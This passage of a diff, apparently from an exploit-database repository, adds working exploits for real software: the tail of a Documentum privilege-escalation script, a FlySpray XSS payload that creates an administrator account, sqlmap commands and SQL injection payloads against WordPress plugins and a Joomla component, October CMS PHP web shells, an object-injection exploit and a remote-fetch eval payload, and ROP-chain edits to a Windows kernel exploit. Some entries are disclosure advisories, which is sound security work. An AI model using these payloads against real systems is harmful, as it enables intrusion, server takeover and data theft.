                "\"\" 0 0 T F T T %s %s'" % \
                (docbase, docbase, install_owner, document_id,
                 document_id, install_owner, session.session)
    session.query(query)
    r = session.query(
        "select user_privileges from dm_user "
        "where user_name=USER") \
        .next_record()['user_privileges']
    if r != 16:
        print "Failed"
        exit(1)
    print "P0wned!"
 def create_session(host, port, user, pwd, identity=None):
    print "Trying to connect to %s:%s as %s ..." % \
          (host, port, user)
    session = None
    try:
        session = DocbaseClient(
            host=host, port=int(port),
            username=user, password=pwd,
            identity=identity)
    except socket.error, e:
        if e.errno == 54:
            session = DocbaseClient(
                host=host, port=int(port),
                username=user, password=pwd,
                identity=identity,
                secure=True, ciphers=CIPHERS)
        else:
            raise e
    docbase = session.docbaseconfig['object_name']
    version = session.serverconfig['r_server_version']
    print "Connected to %s:%s, docbase: %s, version: %s" % \
          (host, port, docbase, version)
    return (session, docbase)
 def is_super_user(session):
    user = session.get_by_qualification(
        "dm_user WHERE user_name=USER")
    if user['user_privileges'] == 16:
        return True
    group = session.get_by_qualification(
        "dm_group where group_name='dm_superusers' "
        "AND any i_all_users_names=USER")
    if group is not None:
        return True
    return False
 if __name__ == '__main__':
    main()
--- a/platforms/php/webapps/41918.txt
+++ b/platforms/php/webapps/41918.txt
@ -0,0 +1,58 @@
 # Exploit Title: XSRF Stored FlySpray 1.0-rc4 (XSS2CSRF add admin account)
 # Date: 19/04/2017
 # Exploit Author: Cyril Vallicari / HTTPCS / ZIWIT
 : https://www.openoffice.org
 # Version: 1.0-rc4
 # Tested on: Windows 7 x64 SP1 / Kali Linux
 Description :
 A vulnerability has been discovered in Flyspray , which can be
 exploited by malicious people to conduct cross-site scripting attacks. Input
 passed via the 'real_name' parameter to '/index.php?do=myprofile' is not
 properly sanitised before being returned to the user. This can be exploited
 to execute arbitrary HTML and script code in a user's browser session in
 context of an affected site.
 The script is executed on the parameter page AND on any page that allow the
 user to put a comment.
 This XSS vector allow to execute scripts to gather the CSRF token
 and submit a form to create a new admin
 Here's the script :
 var tok = document.getElementsByName('csrftoken')[0].value;
 var txt = '<form method="POST" id="hacked_form"
 action="index.php?do=admin&area=newuser">'
 txt += '<input type="hidden" name="action" value="admin.newuser"/>'
 txt += '<input type="hidden" name="do" value="admin"/>'
 txt += '<input type="hidden" name="area" value="newuser"/>'
 txt += '<input type="hidden" name="user_name" value="hacker"/>'
 txt += '<input type="hidden" name="csrftoken" value="' + tok + '"/>'
 txt += '<input type="hidden" name="user_pass" value="12345678"/>'
 txt += '<input type="hidden" name="user_pass2" value="12345678"/>'
 txt += '<input type="hidden" name="real_name" value="root"/>'
 txt += '<input type="hidden" name="email_address" value="root@root.com"/>'
 txt += '<input type="hidden" name="verify_email_address" value="
 root@root.com"/>'
 txt += '<input type="hidden" name="jabber_id" value=""/>'
 txt += '<input type="hidden" name="notify_type" value="0"/>'
 txt += '<input type="hidden" name="time_zone" value="0"/>'
 txt += '<input type="hidden" name="group_in" value="1"/>'
 txt += '</form>'
 var d1 = document.getElementById('menu');
 d1.insertAdjacentHTML('afterend', txt);
 document.getElementById("hacked_form").submit();
 This will create a new admin account, hacker:12345678
 POC video : *https://www.youtube.com/watch?v=eCf9a0QpnPs
 Patch : No patch yet
--- a/platforms/php/webapps/41919.txt
+++ b/platforms/php/webapps/41919.txt
@ -0,0 +1,63 @@
 # Exploit Title: KittyCatfish 2.2 Plugin for WordPress - SQL Injection
 # Date: 20/03/2017
 # Exploit Author: TAD GROUP
 # Vendor Homepage: https://wordpress.org/plugins-wp/kittycatfish/
 # Software Link: https://wordpress.org/plugins-wp/kittycatfish/
 # Version: 2.2
 # Contact: info@tad.bg
 # Website: https://tad.bg <https://tad.bg>
 # Category: Web Application Exploits
 1. Description 
 An unescaped parameter was found in KittyCatfish version 2.2 (WP plugin). An attacker can exploit this vulnerability to read from the database.
 The get oarameter 'kc_ad' is vulnerable.
 2. Proof of concept
 sqlmap -u "http://192.168.20.39/wp-content/plugins/kittycatfish/base.css.php?kc_ad=31&ver=2.0""  —dbms —threads=10 —random-agent
 OR
 sqlmap -u "http://192.168.20.39/wp-content/plugins/kittycatfish/kittycatfish.php?kc_ad=37&ver=2.0" —dbms —threads=10 —random-agent —dbms=mysql   —level 5 —risk=3
 Parameter: kc_ad (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: kc_ad=31 AND 2281=2281&ver=2.0
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: kc_ad=31 AND (SELECT * FROM (SELECT(SLEEP(5)))xzZh)&ver=2.0
 3. Attack outcome:
 An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible.
 4. Impact
 Critical
 5. Affected versions
 <= 2.2
 6. Disclosure timeline
 06-Mar-2017 - found the vulnerability
 06-Mar-2017 - informed the developer
 20-Mar-2017 - release date of this security advisory
 Not fixed at the date of submitting this exploit.
--- a/platforms/php/webapps/41920.txt
+++ b/platforms/php/webapps/41920.txt
@ -0,0 +1,50 @@
 # Exploit Title: Car Rental System v2.5
 # Date: 28/03/2017
 # Exploit Author: TAD GROUP
 # Vendor Homepage: https://www.bestsoftinc.com/
 # Software Link: https://www.bestsoftinc.com/car-rental-system.html
 # Version: 2.5
 # Contact: info@tad.bg
 # Website: https://tad.bg <https://tad.bg>
 # Category: Web Application Exploits
 1. Description
 An unescaped parameter was found in Car Rental System v2.5 (WP plugin). An attacker can exploit this vulnerability to read from the database.
 The POST parameters 'pickuploc', 'dropoffloc', and 'car_type' are vulnerable.
 2. Proof of concept
 sqlmap -u "http://server/wp-car/" —data="pickuploc=2&dropoffloc=1&car_type=&pickup=03/08/2017&pickUpTime=09:00:00&dropoff=03/18/2017&dropoffTime=09:00:00&btn_room_search=" --dbs --threads=5 --random-agent
 Parameter: pickuploc (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pickuploc=2 AND 3834=3834&dropoffloc=1&car_type=&pickup=03/08/2017&pickUpTime=09:00:00&dropoff=03/18/2017&dropoffTime=09:00:00&btn_room_search=
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: pickuploc=2 AND SLEEP(5)&dropoffloc=1&car_type=&pickup=03/08/2017&pickUpTime=09:00:00&dropoff=03/18/2017&dropoffTime=09:00:00&btn_room_search=
 The same is applicable for 'dropoffloc' and 'car_type' parameters
 3. Attack outcome:
 An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible.
 4. Impact
 Critical
 5. Affected versions
 <= 2.5
 6. Disclosure timeline
 13-Mar-2017 - found the vulnerability
 13-Mar-2017 - informed the developer
 28-Mar-2017 - release date of this security advisory
 Not fixed at the date of submitting this exploit.
--- a/platforms/php/webapps/41921.txt
+++ b/platforms/php/webapps/41921.txt
@ -0,0 +1,47 @@
 # Exploit Title: Wow Viral Signups v2.1 WordPress Plugin SQL Injection
 # Date: 29/03/2017
 # Exploit Author: TAD GROUP
 # Vendor Homepage: http://wow-company.com/
 # Software Link: https://wordpress.org/plugins/mwp-viral-signup/
 # Version: 2.1
 # Contact: info@tad.bg
 # Website: https://tad.bg <https://tad.bg>
 # Category: Web Application Exploits
 1. Description
 An unescaped parameter was found in Wow Viral Signups v2.1 (WP plugin). An attacker can exploit this vulnerability to read from the database.
 The POST parameter 'idsignup' is vulnerable.
 2. Proof of concept
 sqlmap -u  "http://server/wp-admin/admin-ajax.php" --data "action=mwp_signup_send&email=GING%40MAIL.RU&hvost=%3Fpage_id%3D47&idsignup=1" --dbs --threads=10 --random-agent --dbms mysql
 Parameter: idsignup (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=mwp_signup_send&email=GING@MAIL.RU&hvost=?page_id=47&idsignup=1 AND 5272=5272
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: action=mwp_signup_send&email=GING@MAIL.RU&hvost=?page_id=47&idsignup=1 AND (SELECT * FROM (SELECT(SLEEP(5)))hXXu)
 3. Attack outcome:
 An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible.
 4. Impact
 Critical
 5. Affected versions
 <= 2.1
 6. Disclosure timeline
 15-Mar-2017 - found the vulnerability
 15-Mar-2017 - informed the developer
 29-Mar-2017 - release date of this security advisory
 Not fixed at the date of submitting this exploit.
--- a/platforms/php/webapps/41922.txt
+++ b/platforms/php/webapps/41922.txt
@ -0,0 +1,51 @@
 # Exploit Title: Wow Forms v2.1 WordPress Plugin SQL Injection
 # Date: 29/03/2017
 # Exploit Author: TAD GROUP
 # Vendor Homepage: http://wow-company.com/
 # Software Link: https://wordpress.org/plugins/mwp-forms/
 # Version: 2.1
 # Contact: info@tad.bg
 # Website: https://tad.bg <https://tad.bg>
 # Category: Web Application Exploits
 1. Description
 An unescaped parameter was found in Wow Forms v2.1 (WP plugin). An attacker can exploit this vulnerability to read from the database.
 The POST parameter 'wowformid' is vulnerable.
 2. Proof of concept
 sqlmap -u "http://server/wp-admin/admin-ajax.php" --data "action=send_mwp_form&arrkey%5B%5D=mwp-field-0&arrkey%5B%5D=mwp-forms-textarea-0&arrval%5B%5D=form2&arrval%5B%5D=rrr&mwpformid=1*"  --dbs --threads=10 --random-agent --dbms mysql
 Parameter: Array-like #6* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=send_mwp_form&arrkey[]=mwp-field-0&arrkey[]=mwp-forms-textarea-0&arrval[]=form2&arrval[]=rrr&mwpformid=4 AND 6968=6968
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: action=send_mwp_form&arrkey[]=mwp-field-0&arrkey[]=mwp-forms-textarea-0&arrval[]=form2&arrval[]=rrr&mwpformid=4 AND (SELECT * FROM (SELECT(SLEEP(5)))gxQa)
    Type: UNION query
    Title: Generic UNION query (NULL) - 65 columns
    Payload: action=send_mwp_form&arrkey[]=mwp-field-0&arrkey[]=mwp-forms-textarea-0&arrval[]=form2&arrval[]=rrr&mwpformid=4 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766a7671,0x6b656f4d516d7a6b736f596f49746d4e776a7663716f4d41654c6e516e516c6c6c7a5274744a6d57,0x716a6b6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL— -
 3. Attack outcome:
 An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible.
 4. Impact
 Critical
 5. Affected versions
 <= 2.1
 6. Disclosure timeline
 15-Mar-2017 - found the vulnerability
 15-Mar-2017 - informed the developer
 29-Mar-2017 - release date of this security advisory
 Not fixed at the date of submitting this exploit.
--- a/platforms/php/webapps/41930.txt
+++ b/platforms/php/webapps/41930.txt
@ -0,0 +1,16 @@
 # Exploit Title: Joomla Component Myportfolio 3.0.2 - SQL Injection
 # Exploit Author: Persian Hack Team
 # Discovered by : Mojtaba Kazemi (Mojtaba MobhaM)
 # Home : https://extensions.joomla.org/extensions/extension/directory-a-documentation/portfolio/myportfolio/
 # Home : http://persian-team.ir/
 # Telegram Channel AND Demo: @PersianHackTeam
 # Google Dork : inurl:index.php?option=com_myportfolio
 # Tested on: Linux
 # Date: 2017-04-24
 # POC :
 # pid Parameter Vulnerable to SQL Injection
 # http://www.Target.com/index.php?task=project&view=grid&id=1&pid=[SQL]&format=raw&option=com_myportfolio&Itemid=125
 # Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
 # Iranian White Hat Hackers
--- a/platforms/php/webapps/41936.txt
+++ b/platforms/php/webapps/41936.txt
@ -0,0 +1,404 @@
 October CMS v1.0.412 several vulnerabilities
 ############################################
 Information
 ===========
 Name:          October CMS v1.0.412 (build 412)
 Homepage:      http://octobercms.com
 Vulnerability: several issues, including PHP code execution
 Prerequisites: attacker has to be authenticated user with media or asset
               management permission
 CVE:           pending
 Credit:        Anti Räis
 HTML version:  https://bitflipper.eu
 Product
 =======
 October is a free, open-source, self-hosted CMS platform based on the
 Laravel
 PHP Framework.
 Description
 ===========
 October CMS build 412 contains several vulnerabilities. Some of them
 allow an
 attacker to execute PHP code on the server. Following issues have been
 identified:
    1. PHP upload protection bypass
    2. Apache .htaccess upload
    3. stored WCI in image name
    4. reflected WCI while displaying project ID
    5. PHP code execution via asset management
    6. delete file via PHP object injection
    7. asset save path modification
 Proof of Concepts
 =================
 1. PHP upload protection bypass
 -------------------------------
 Authenticated user with permission to upload and manage media contents can
 upload various files on the server. Application prevents the user from
 uploading PHP code by checking the file extension. It uses black-list based
 approach, as seen in octobercms/vendor/october/rain/src/Filesystem/
 Definitions.php:blockedExtensions().
 ==================== source start ========================
 106 <?php
 107 protected function blockedExtensions()
 108 {
 109         return [
 110                 // redacted
 111                 'php',
 112                 'php3',
 113                 'php4',
 114                 'phtml',
 115                 // redacted
 116         ];
 117 }
 ====================  source end  ========================
 We can easily bypass file upload restriction on those systems by using an
 alternative extension, e.g if we upload sh.php5 on the server:
 ==================== source start ========================
 <?php $_REQUEST['x']($_REQUEST['c']);
 ====================  source end  ========================
 Code can be execute by making a following request:
 http://victim.site/storage/app/media/sh.php5?x=system&c=pwd
 2. Apache .htaccess upload
 --------------------------
 As described in the PHP upload protection bypass section, the
 application uses
 black-list based defense. It does not prevent the attacker from uploading a
 .htaccess files which makes it exploitable on Apache servers. Attacker
 can use
 it to add another handler for PHP files and upload code under an alternative
 name. Attacker has to first upload the .htaccess configuration file with
 following settings:
 ==================== source start ========================
 AddHandler application/x-httpd-php .z
 ====================  source end  ========================
 This will execute all .z files as PHP and after uploading a code named
 sh.z to
 the server. It can be used to execute code as described previously.
 3. stored WCI in image name
 ---------------------------
 Authenticated user, with permission to customize back-end settings, can
 store
 WCI payload in the image name. The functionality is located at:
  Settings -> Customize Back-end -> Brand Logo -> (upload logo) ->
  (edit name) -> (add title)
 Set the name to following value:
 ==================== source start ========================
 "><script>alert("stored WCI")</script x="
 ====================  source end  ========================
 Payload is executed when the victim clicks on the image name to edit it.
 When the administrator edits user's profile image, attacker's payload is
 executed, allowing him to execute JavaScript during administrator's active
 session. This can be used, for example, to give another user a "super-user"
 permission.
 4. reflected WCI while displaying project ID
 --------------------------------------------
 Authenticated user with permission to manage software updates can "Attach
 Project". When invalid value is provided, the error message doesn't properly
 escape the given value, which allows an attacker to execute code. Since it
 requires the victim to paste or write the payload in the input field,
 then it
 isn't easily exploitable.
 ==================== source start ========================
 "><script>alert(1)</script x="
 ====================  source end  ========================
 5. PHP code execution via asset management
 ------------------------------------------
 Authenticated user with permission to manage website assets, can use this
 functionality to upload PHP code and execute it on the server.
 Asset management URL: http://victim.site/backend/cms.
 Functionality is located at: CMS -> Assets -> Add -> Create file.
 First, attacker creates a new asset test.js with the following content:
 ==================== source start ========================
 <pre><?php if(isset($_REQUEST['x'])){echo system($_REQUEST['x']);}?></pre>
 ====================  source end  ========================
 After saving the file, attacker renames it to test.php5 by clicking on ">_"
 icon on the newly created file. Modal window opens which allows to specify a
 new filename.
 URL to execute PHP code:
 http://victim.site/themes/demo/assets/test.php5?x=ls%20-lah
 6. delete file via PHP object injection
 ---------------------------------------
 Authenticated user with "Create, modify and delete CMS partials" or "Create,
 modify and delete CMS layouts" can move assets to different folders. This
 functionality is vulnerable to PHP object injection. User input is read from
 selectedList parameter on line 11 and passed as argument to unserialize().
 Unserialized array object is passed to validatePath() on line 32.
 ==================== source start ========================
 1 <?php namespace Cms\Widgets;
 2
 3 class AssetList extends WidgetBase
 4 {
 5     // redacted
 6
 7     public function onMove()
 8     {
 9         $this->validateRequestTheme();
 10
 11         $selectedList = Input::get('selectedList');
 12         if (!strlen($selectedList)) {
 13             throw new ApplicationException(
                   Lang::get('cms::lang.asset.selected_files_not_found'));
 14         }
 15
 16         $destinationDir = Input::get('dest');
 17         if (!strlen($destinationDir)) {
 18             throw new ApplicationException(
                   Lang::get('cms::lang.asset.select_destination_dir'));
 19         }
 20
 21         $destinationFullPath = $this->getFullPath($destinationDir);
 22         if (!file_exists($destinationFullPath) ||
               !is_dir($destinationFullPath)) {
 23             throw new ApplicationException(
                   Lang::get('cms::lang.asset.destination_not_found'));
 24         }
 25
 26         $list = @unserialize(@base64_decode($selectedList));
 27         if ($list === false) {
 28             throw new ApplicationException(
                   Lang::get('cms::lang.asset.selected_files_not_found'));
 29         }
 30
 31         foreach ($list as $path) {
 32             if (!$this->validatePath($path)) {
 33                 throw new ApplicationException(
                       Lang::get('cms::lang.asset.invalid_path'));
 34             }
 35
 36     // ...
 ====================  source end  ========================
 Following PHP exploit uses the vulnerability. It requires an authenticated
 user's session to execute as described previously.
 ==================== source start ========================
 <?php
 class Swift_Mime_SimpleHeaderSet {}
 class Swift_KeyCache_DiskKeyCache
 {
    private $_keys;
    public function __construct($path, $filename) {
        $this->_keys = [$path => [ $filename => null]];
    }
 }
 class Swift_Mime_SimpleMimeEntity {
        private $_headers;
        private $_cache;
        private $_cacheKey;
        public function __construct($filename, $path = '') {
                $this->_headers = new Swift_Mime_SimpleHeaderSet();
                $this->_cache = new Swift_KeyCache_DiskKeyCache($path,
                    $filename);
                $this->_cacheKey = $path;
        }
 }
 function payload($filename) {
        $builder = new Swift_Mime_SimpleMimeEntity($filename);
        return base64_encode(serialize([$builder]));
 }
 function http($config) {
        $ch = curl_init($config['url']);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS,
            http_build_query($config['data']));
        curl_setopt($ch, CURLOPT_HTTPHEADER, $config['headers']);
        curl_setopt($ch, CURLOPT_COOKIE, $config['cookies']);
        curl_setopt($ch, CURLOPT_PROXY, $config['proxy']);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_HEADER, false);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        return curl_exec($ch);
 }
 function get_config($url, $filename, $session) {
        return [
                'url' => $url.'/backend/cms',
                'data' => [
                        'dest' => '/',
                        'theme' => 'demo',
                        'selectedList' => payload($filename),
                ],
                'headers' => [
                        'X-OCTOBER-REQUEST-HANDLER: assetList::onMove',
                        'X-Requested-With: XMLHttpRequest',
                ],
                'cookies' => 'admin_auth='.$session,
                'proxy' => 'localhost:8080',
        ];
 }
 $url = 'http://victim.site';
 $session = '<specify admin_auth cookie value here>';
 $filename = '/tmp/target.txt';
 echo http(get_config($url, $filename, $session));
 ====================  source end  ========================
 7. asset save path modification
 -------------------------------
 Authenticated user, with permission to manage website assets, can modify the
 path the file is saved to. This allows an attacker to save css, js, less,
 sass, scss files at different locations. Attacker can possibly use it to
 execute JavaScript on the site, if the application tries to require an
 file on
 the server that does not exist or the attacker manages to delete the file
 beforehand. When an attacker creates a new asset, then the following request
 is made.
 Asset management URL: http://victim.site/backend/cms.
 Functionality is located at: CMS -> Assets -> Add -> Create file.
 ==================== request ========================
 POST /backend/cms HTTP/1.1
 Host: victim.site
 Content-Length: 817
 Content-Type: application/x-www-form-urlencoded
 X-OCTOBER-REQUEST-HANDLER: onSave
 X-Requested-With: XMLHttpRequest
 Cookie: admin_auth=...;
 Connection: close
 fileName=test.js&content=test&templateType=asset&theme=demo
 ==================== request end ====================
 The parameter fileName isn't validated and allows an attacker to specify an
 path where the file should be saved to. Overwriting files is forbidden.
 If we
 specify the file name as ../../../test.js then we can assert that the
 file is
 created at the root of site's web directory.
 We can execute JavaScript by combining this issue with file deletion
 vulnerability via POI. For that, we are going to replace the
 modules/backend/
 assets/js/vendor/jquery.min.js file with our own content. It is loaded
 on the
 page for every authenticated user and allows us as an attacker to take
 control
 of their session. The payload for this example is the following:
 ==================== source start ========================
 var c = new XMLHttpRequest();
 c.open('GET', 'https://code.jquery.com/jquery-1.11.1.js', false);
 c.onreadystatechange = () => eval(c.responseText);
 c.send();
 var h = () => {location.hash = 'Hacked: ' + (new Date())};
 setInterval(h, 1000);
 ====================  source end  ========================
 After we delete the jquery.min.js file on the server, we create a new asset
 with the payload as the content.
 ==================== request ========================
 POST /backend/cms HTTP/1.1
 Host: victim.site
 Content-Length: 371
 Content-Type: application/x-www-form-urlencoded
 X-OCTOBER-REQUEST-HANDLER: onSave
 X-Requested-With: XMLHttpRequest
 Cookie: admin_auth=...;
 Connection: close
 fileName=../../../modules/backend/assets/js/vendor/jquery.min.js&content=
 var+c+%3d+new+XMLHttpRequest()%3b
 c.open('GET',+'https%3a//code.jquery.com/jquery-1.11.1.js',+false)%3b
 c.onreadystatechange+%3d+()+%3d>+eval(c.responseText)%3b
 c.send()%3b
 var+h+%3d+()+%3d>+{location.hash+%3d+'Hacked%3a+'+%2b+(new+Date())}%3b
 setInterval(h,+1000)%3b
 &templateType=asset&theme=demo
 ==================== request end ====================
 After the victim authenticates, the payload is executed. For this
 example, it
 changes the URL hash every second, but can be used to take control of the
 victims session.
 Conclusion
 ==========
 Authenticated user with permission to manage website assets, upload and
 manage
 media contents or customize back-end settings can use vulnerabilities found
 there to execute PHP code on the server and take control of the application.
 New release v1.0.413 has been made available as a result:
    https://octobercms.com/support/article/rn-8
    https://github.com/octobercms/october/releases/tag/v1.0.413.
 Timeline
 ========
 05.04.2017 | me > developer     | first vulnerability discovered
 06.04.2017 | me > developer     | initial contact
 07.04.2017 | me > developer     | sent PoC
 09.04.2017 | developer > me     | developer implemented patches;
                                  requested additional information
 09.04.2017 | me > developer     | sent PoC with additional information
                                  and findings
 10.04.2017 | developer > me     | all issues were patched
 11.04.2017 | developer > public | new release
 11.04.2017 | me > DWF           | CVE request
 12.04.2017 | me > public        | full disclosure
 ---
 Anti Anti Räis
 Blog: https://bitflipper.eu
 Pentester at http://www.clarifiedsecurity.com
--- a/platforms/win_x86-64/dos/41547.py
+++ b/platforms/win_x86-64/dos/41547.py
--- a/platforms/win_x86-64/local/41605.txt
+++ b/platforms/win_x86-64/local/41605.txt
--- a/platforms/win_x86-64/local/41722.c
+++ b/platforms/win_x86-64/local/41722.c
@ -4,7 +4,7 @@ Check these out:
 - https://labs.mwrinfosecurity.com/blog/a-tale-of-bitmaps/
 Tested on: 
 - Windows 10 Pro x64 (Post-Anniversary)
- ntoskrnl: 10.0.14393.693
+- ntoskrnl.exe: 10.0.14393.953
 - FortiShield.sys: 5.2.3.633
 Thanks to master @ryujin and @ronin for helping out. And thanks to Morten (@Blomster81) for the MiGetPteAddress :D 
 */
@ -63,7 +63,7 @@ struct bitmap_structure create_bitmaps(HACCEL hAccel[object_number]) {
 	char *worker_bitmap_memory;
 	HBITMAP manager_bitmap;
 	HBITMAP worker_bitmap;
-	int nWidth = 0x700;
+	int nWidth = 0x703;
 	int nHeight = 2;
 	unsigned int cPlanes = 1;
 	unsigned int cBitsPerPel = 8;
@ -170,7 +170,7 @@ HACCEL create_accelerator_table(HACCEL hAccel[object_number], int table_number)
 LPVOID allocate_rop_chain(LPVOID kernel_base, ULONGLONG fortishield_callback, ULONGLONG fortishield_restore, ULONGLONG manager_pvScan_offset, ULONGLONG worker_pvScan_offset) {
 	HANDLE pid;
 	pid = GetCurrentProcess();
-	ULONGLONG rop_chain_address = 0x0000000048ff07da;
+	ULONGLONG rop_chain_address = 0x000000008aff07da;
 	LPVOID allocate_rop_chain;
 	allocate_rop_chain = VirtualAlloc((LPVOID*)rop_chain_address, 0x12000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
 	if (allocate_rop_chain == NULL) {
@ -179,28 +179,28 @@ LPVOID allocate_rop_chain(LPVOID kernel_base, ULONGLONG fortishield_callback, UL
 	}
 	/* <Null callback> */
-	ULONGLONG rop_01 = (ULONGLONG)kernel_base + 0x146cdf;	// pop rax; pop rcx; ret
+	ULONGLONG rop_01 = (ULONGLONG)kernel_base + 0x14adaf;	// pop rax; pop rcx; ret
 	ULONGLONG rop_02 = fortishield_callback;
 	ULONGLONG rop_03 = 0x0000000000000000;					// NULL the callback
-	ULONGLONG rop_04 = (ULONGLONG)kernel_base + 0xed9c1;	// mov qword ptr [rax], rcx ; ret 
+	ULONGLONG rop_04 = (ULONGLONG)kernel_base + 0xb7621;	// mov qword ptr [rax], rcx ; ret 
 	/* </Null callback> */
 	/* <Overwrite pvScan0> */
-	ULONGLONG rop_05 = (ULONGLONG)kernel_base + 0x146cdf;	// pop rax; pop rcx; ret
+	ULONGLONG rop_05 = (ULONGLONG)kernel_base + 0x14adaf;	// pop rax; pop rcx; ret
 	ULONGLONG rop_06 = (ULONGLONG)manager_pvScan_offset;	// Manager BitMap pvScan0 offset
 	ULONGLONG rop_07 = (ULONGLONG)worker_pvScan_offset;		// Worker BitMap pvScan0 offset
-	ULONGLONG rop_08 = (ULONGLONG)kernel_base + 0xed9c1;	// mov qword ptr [rax], rcx ; ret 
+	ULONGLONG rop_08 = (ULONGLONG)kernel_base + 0xb7621;	// mov qword ptr [rax], rcx ; ret 
 	/* </Overwrite pvScan0> */
 	/* <Prepare RBX (to write the orignial stack pointer to> */
-	ULONGLONG rop_09 = (ULONGLONG)kernel_base + 0x155a;		// pop rbx ; ret
+	ULONGLONG rop_09 = (ULONGLONG)kernel_base + 0x62c0c3;	// pop rbx ; ret
-	ULONGLONG rop_10 = 0x000000004900007b;
+	ULONGLONG rop_10 = 0x000000008b0000e0;
 	/* </Prepare RBX (to write the orignial stack pointer to> */
 	/* <Get RSI value (points to the original stack) into RAX> */
-	ULONGLONG rop_11 = (ULONGLONG)kernel_base + 0x4551;		// pop rax ; ret
+	ULONGLONG rop_11 = (ULONGLONG)kernel_base + 0x6292eb;	// pop rax ; ret
-	ULONGLONG rop_12 = (ULONGLONG)kernel_base + 0x12eef4;	// mov rax, rcx ; add rsp, 0x28 ; ret
+	ULONGLONG rop_12 = (ULONGLONG)kernel_base + 0x556dc9;	// mov rax, rcx ; add rsp, 0x28 ; ret
-	ULONGLONG rop_13 = (ULONGLONG)kernel_base + 0x3dc8f;	// mov rcx, rsi ; call rax
+	ULONGLONG rop_13 = (ULONGLONG)kernel_base + 0x4115ca;	// mov rcx, rsi ; call rax
 	ULONGLONG rop_14 = 0x4141414141414141;					// JUNK
 	ULONGLONG rop_15 = 0x4141414141414141;					// JUNK
 	ULONGLONG rop_16 = 0x4141414141414141;					// JUNK
@ -208,19 +208,19 @@ LPVOID allocate_rop_chain(LPVOID kernel_base, ULONGLONG fortishield_callback, UL
 	/* </Get RSI value (points to the original stack) into RAX> */
 	/* <Adjust RAX to point to the return address pushed by the call> */
-	ULONGLONG rop_18 = (ULONGLONG)kernel_base + 0xe37a;		// pop rcx ; ret
+	ULONGLONG rop_18 = (ULONGLONG)kernel_base + 0x61260f;	// pop rcx ; ret
 	ULONGLONG rop_19 = 0x0000000000000028;					// Get the return address
-	ULONGLONG rop_20 = (ULONGLONG)kernel_base + 0x24752;	// sub rax, rcx ; ret
+	ULONGLONG rop_20 = (ULONGLONG)kernel_base + 0xd8c12;	// sub rax, rcx ; ret
 	/* </Adjust RAX to point to the return address pushed by the call> */
 	/* <Overwrite the return from the call with fortishield_restore> */
-	ULONGLONG rop_21 = (ULONGLONG)kernel_base + 0xe37a;		// pop rcx ; ret
+	ULONGLONG rop_21 = (ULONGLONG)kernel_base + 0x61260f;	// pop rcx ; ret
 	ULONGLONG rop_22 = fortishield_restore;
-	ULONGLONG rop_23 = (ULONGLONG)kernel_base + 0xed9c1;	// mov qword ptr [rax], rcx ; ret
+	ULONGLONG rop_23 = (ULONGLONG)kernel_base + 0xb7621;	// mov qword ptr [rax], rcx ; ret
 	/* </Overwrite the return from the call with fortishield_restore> */
 	/* <Write the original stack pointer on our usermode_stack> */
-	ULONGLONG rop_24 = (ULONGLONG)kernel_base + 0x400b2a;	// mov qword ptr [rbx + 0x10], rax ; add rsp, 0x20 ; pop rbx ; ret
+	ULONGLONG rop_24 = (ULONGLONG)kernel_base + 0x4cde3e;	// mov qword ptr [rbx + 0x10], rax ; add rsp, 0x20 ; pop rbx ; ret
 	ULONGLONG rop_25 = 0x4141414141414141;					// JUNK
 	ULONGLONG rop_26 = 0x4141414141414141;					// JUNK
 	ULONGLONG rop_27 = 0x4141414141414141;					// JUNK
@ -229,43 +229,43 @@ LPVOID allocate_rop_chain(LPVOID kernel_base, ULONGLONG fortishield_callback, UL
 	/* </Write the original stack pointer on our usermode_stack> */
 	/* <Restore stack pointer> */
-	ULONGLONG rop_30 = (ULONGLONG)kernel_base + 0x33b4;		// pop rsp ; ret
+	ULONGLONG rop_30 = (ULONGLONG)kernel_base + 0x62b91b;	// pop rsp ; ret
 	/* </Restore stack pointer> */
 	char *rop_chain;
 	DWORD rop_chain_size = 0x12000;
 	rop_chain = (char *)malloc(rop_chain_size);
-	memset(rop_chain, 0x00, rop_chain_size);
+	memset(rop_chain, 0x41, rop_chain_size);
-	memcpy(rop_chain + 0xf7c1, &rop_01, 0x08);
+	memcpy(rop_chain + 0xf826, &rop_01, 0x08);
-	memcpy(rop_chain + 0xf7c9, &rop_02, 0x08);
+	memcpy(rop_chain + 0xf82e, &rop_02, 0x08);
-	memcpy(rop_chain + 0xf7d1, &rop_03, 0x08);
+	memcpy(rop_chain + 0xf836, &rop_03, 0x08);
-	memcpy(rop_chain + 0xf7d9, &rop_04, 0x08);
